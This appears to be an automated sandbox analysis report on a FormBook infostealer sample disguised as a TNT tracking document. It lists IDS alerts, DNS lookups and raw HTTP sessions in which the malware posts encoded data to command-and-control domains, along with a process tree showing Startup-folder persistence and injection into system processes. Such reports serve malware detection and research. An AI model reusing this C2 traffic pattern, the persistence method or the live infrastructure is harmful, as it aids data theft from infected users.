                                                  ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                  OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T18:39:08.495731+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49841 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:25.345565+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49880 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:28.014150+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49886 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:30.768674+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49895 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:34.352227+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49902 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:49.598024+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49938 | 8.217.17.192 | 80 | TCP
2024-12-17T18:39:52.254372+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49944 | 8.217.17.192 | 80 | TCP
2024-12-17T18:39:54.910475+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49951 | 8.217.17.192 | 80 | TCP
2024-12-17T18:39:57.628568+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49959 | 8.217.17.192 | 80 | TCP
2024-12-17T18:40:04.454686+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49976 | 209.74.64.189 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 18:39:06.670341015 CET | 192.168.2.6 | 1.1.1.1 | 0x84af | Standard query (0) | www.arcare.partners | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:23.538861990 CET | 192.168.2.6 | 1.1.1.1 | 0x4da3 | Standard query (0) | www.medicaresbasics.xyz | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:39.366869926 CET | 192.168.2.6 | 1.1.1.1 | 0xc114 | Standard query (0) | www.resellnexa.shop | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:47.663718939 CET | 192.168.2.6 | 1.1.1.1 | 0x355f | Standard query (0) | www.meliorahomes.net | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:40:02.648977995 CET | 192.168.2.6 | 1.1.1.1 | 0x2ac9 | Standard query (0) | www.martmall.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 18:39:07.259875059 CET | 1.1.1.1 | 192.168.2.6 | 0x84af | No error (0) | www.arcare.partners | arcare.partners | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 18:39:07.259875059 CET | 1.1.1.1 | 192.168.2.6 | 0x84af | No error (0) | arcare.partners | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:07.259875059 CET | 1.1.1.1 | 192.168.2.6 | 0x84af | No error (0) | arcare.partners | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:24.125812054 CET | 1.1.1.1 | 192.168.2.6 | 0x4da3 | No error (0) | www.medicaresbasics.xyz | medicaresbasics.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 18:39:24.125812054 CET | 1.1.1.1 | 192.168.2.6 | 0x4da3 | No error (0) | medicaresbasics.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:24.125812054 CET | 1.1.1.1 | 192.168.2.6 | 0x4da3 | No error (0) | medicaresbasics.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:39.599817038 CET | 1.1.1.1 | 192.168.2.6 | 0xc114 | Name error (3) | www.resellnexa.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:39:47.943042994 CET | 1.1.1.1 | 192.168.2.6 | 0x355f | No error (0) | www.meliorahomes.net | | 8.217.17.192 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 18:40:03.078237057 CET | 1.1.1.1 | 192.168.2.6 | 0x2ac9 | No error (0) | www.martmall.info | | 209.74.64.189 | A (IP address) | IN (0x0001) | false
                                                  • www.arcare.partners
                                                  • www.medicaresbasics.xyz
                                                  • www.meliorahomes.net
                                                  • www.martmall.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49841 | 3.33.130.190 | 80 | 2248 | C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 18:39:07.394342899 CET | 515 | OUT | GET /0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs HTTP/1.1
Host: www.arcare.partners
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Dec 17, 2024 18:39:08.495027065 CET | 388 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Tue, 17 Dec 2024 17:39:08 GMT
content-length: 267
connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49880 | 3.33.130.190 | 80 | 2248 | C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 18:39:24.257255077 CET | 795 | OUT | POST /fm31/ HTTP/1.1
Host: www.medicaresbasics.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.medicaresbasics.xyz
Referer: http://www.medicaresbasics.xyz/fm31/
Cache-Control: no-cache
Content-Length: 210
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Data Ascii: RDupG=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX/e8j7LAZqGYue//mPXqHq8HuMWsCi3coQ3AJiRB8AsX
Dec 17, 2024 18:39:25.345381021 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49886 | 3.33.130.190 | 80 | 2248 | C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 18:39:26.925138950 CET | 819 | OUT | POST /fm31/ HTTP/1.1
Host: www.medicaresbasics.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.medicaresbasics.xyz
Referer: http://www.medicaresbasics.xyz/fm31/
Cache-Control: no-cache
Content-Length: 234
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Data Ascii: RDupG=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo18mH7H7Gb9WQbQKPkYdNXJag7r9FRx8i/6ndloic5KB4Hw6HRwpszt4Q1mBuZ2Rq8C9akwnx4MzfmWl2CNrKo0FkS5WTc2EBoPp9XgQ340MA3IOJkbivxSYcbj8tHEMtf7roil68XJV6cFuOOeCC32qQPAb1dmz0J0qojjBqIKZvDT/LL+QoRwGw==
Dec 17, 2024 18:39:28.013927937 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49895 | 3.33.130.190 | 80 | 2248 | C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 18:39:29.574173927 CET | 1832 | OUT | POST /fm31/ HTTP/1.1
Host: www.medicaresbasics.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.medicaresbasics.xyz
Referer: http://www.medicaresbasics.xyz/fm31/
Cache-Control: no-cache
Content-Length: 1246
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Data Ascii: RDupG= [TRUNCATED]
Dec 17, 2024 18:39:30.768387079 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49902 | 3.33.130.190 | 80 | 2248 | C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:32.230590105 CET519OUTGET /fm31/?RDupG=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&wdw=m8AHs HTTP/1.1
                                                  Host: www.medicaresbasics.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Timestamp:Dec 17, 2024 18:39:34.351852894 CET
                                                  Bytes transferred:388
                                                  Direction:IN
                                                  Data:HTTP/1.1 200 OK
                                                  content-type: text/html
                                                  date: Tue, 17 Dec 2024 17:39:34 GMT
                                                  content-length: 267
                                                  connection: close
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RDupG=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&wdw=m8AHs"}</script></head></html>


                                                  Session ID:5
                                                  Source IP:192.168.2.6
                                                  Source Port:49938
                                                  Destination IP:8.217.17.192
                                                  Destination Port:80
                                                  PID:2248
                                                  Process:C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  Timestamp:Dec 17, 2024 18:39:48.088808060 CET
                                                  Bytes transferred:786
                                                  Direction:OUT
                                                  Data:POST /ir1u/ HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.meliorahomes.net
                                                  Referer: http://www.meliorahomes.net/ir1u/
                                                  Cache-Control: no-cache
                                                  Content-Length: 210
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Ascii: RDupG=jai/NoPHoBCQh8m21NS+Q5zf5LhfWxfoCIgMy1AUbSJtVoK3edonCmFj0R0S2DoLZqUO4JvYxhU73Jx8Lc//7tGSbm2OLkGIPPpaqIKOB4HbKHGHROjb8wUqAuzcozfh+MCAKcxaF7b+sVCo3RTiylx3Yio6p7divnVtw4lOXOOqFuWfmFw0JyM9LDW+Chn8ZVbZRUd/M0ny
                                                  Timestamp:Dec 17, 2024 18:39:49.640261889 CET
                                                  Bytes transferred:393
                                                  Direction:IN
                                                  Data:HTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:39:49 GMT
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                  Content-Length: 203
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                  Session ID:6
                                                  Source IP:192.168.2.6
                                                  Source Port:49944
                                                  Destination IP:8.217.17.192
                                                  Destination Port:80
                                                  PID:2248
                                                  Process:C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  Timestamp:Dec 17, 2024 18:39:50.744942904 CET
                                                  Bytes transferred:810
                                                  Direction:OUT
                                                  Data:POST /ir1u/ HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.meliorahomes.net
                                                  Referer: http://www.meliorahomes.net/ir1u/
                                                  Cache-Control: no-cache
                                                  Content-Length: 234
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Ascii: RDupG=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgttVI63fZ8nPGFj/x0b4joMZqYG4JjYxgw73IB8Krj859GQAW2IIUGIPPpaqMbrB8rbKX2HRvjY1QVYIOzcszft+MC+KeUBF/r+sXaowD3h4lw8cipF5JE+g3Isurt6X8eBJ4LF62wXbis/LBOMCBnWbVjZDDRYDACRdQiW1UylprxwCjYgTcPvLA==
                                                  Timestamp:Dec 17, 2024 18:39:52.302967072 CET
                                                  Bytes transferred:393
                                                  Direction:IN
                                                  Data:HTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:39:52 GMT
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                  Content-Length: 203
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                  Session ID:7
                                                  Source IP:192.168.2.6
                                                  Source Port:49951
                                                  Destination IP:8.217.17.192
                                                  Destination Port:80
                                                  PID:2248
                                                  Process:C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  Timestamp:Dec 17, 2024 18:39:53.402185917 CET
                                                  Bytes transferred:1823
                                                  Direction:OUT
                                                  Data:POST /ir1u/ HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.meliorahomes.net
                                                  Referer: http://www.meliorahomes.net/ir1u/
                                                  Cache-Control: no-cache
                                                  Content-Length: 1246
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)


                                                  Session ID:8
                                                  Source IP:192.168.2.6
                                                  Source Port:49959
                                                  Destination IP:8.217.17.192
                                                  Destination Port:80
                                                  PID:2248
                                                  Process:C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  Timestamp:Dec 17, 2024 18:39:56.062727928 CET
                                                  Bytes transferred:516
                                                  Direction:OUT
                                                  Data:GET /ir1u/?RDupG=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX86+yEJ2aXOXj0apRFi4P0I8PrRUWlOvP3kyATHOLhpgDgxP6JOJQ=&wdw=m8AHs HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Timestamp:Dec 17, 2024 18:39:57.627840996 CET
                                                  Bytes transferred:393
                                                  Direction:IN
                                                  Data:HTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:39:57 GMT
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                  Content-Length: 203
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                  Session ID:9
                                                  Source IP:192.168.2.6
                                                  Source Port:49976
                                                  Destination IP:209.74.64.189
                                                  Destination Port:80
                                                  PID:2248
                                                  Process:C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  Timestamp:Dec 17, 2024 18:40:03.212359905 CET
                                                  Bytes transferred:777
                                                  Direction:OUT
                                                  Data:POST /mnch/ HTTP/1.1
                                                  Host: www.martmall.info
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.martmall.info
                                                  Referer: http://www.martmall.info/mnch/
                                                  Cache-Control: no-cache
                                                  Content-Length: 210
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Ascii: RDupG=i+pAVpf1RduFQ2GCxdgjo3ADOIMeB0Za5O5PlVUerSH8XLjlGKxft4Hy/77LtfdQD4qfYiomR9DO0GHOfVJM6iG1CXhBlhFHIVR0NCQswLo613/huJ38sdGdyauoQfaegP+K0MtMtURsRiYUoAMGR7HtG4eJxPDHNKTCpbDStc7mwGfSuqWhHI+nkmh0QsKF42SyzNRkj5Te
                                                  Timestamp:Dec 17, 2024 18:40:04.454339981 CET
                                                  Bytes transferred:533
                                                  Direction:IN
                                                  Data:HTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:40:04 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>



                                                  Target ID:0
                                                  Start time:12:37:58
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                                  Imagebase:0xec0000
                                                  File size:1'169'920 bytes
                                                  MD5 hash:C32B24D16816AF9ADDD23883F8B474BB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:12:37:59
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                                  Imagebase:0x1c0000
                                                  File size:1'169'920 bytes
                                                  MD5 hash:C32B24D16816AF9ADDD23883F8B474BB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 58%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:12:38:01
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                                  Imagebase:0xb10000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:12:38:10
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
                                                  Imagebase:0x7ff6196c0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:12:38:11
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                                                  Imagebase:0x1c0000
                                                  File size:1'169'920 bytes
                                                  MD5 hash:C32B24D16816AF9ADDD23883F8B474BB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:12:38:13
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                                                  Imagebase:0xb10000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:12:38:44
                                                  Start date:17/12/2024
                                                  Path:C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe"
                                                  Imagebase:0x7c0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:10
                                                  Start time:12:38:46
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\mobsync.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                  Imagebase:0xc30000
                                                  File size:93'696 bytes
                                                  MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
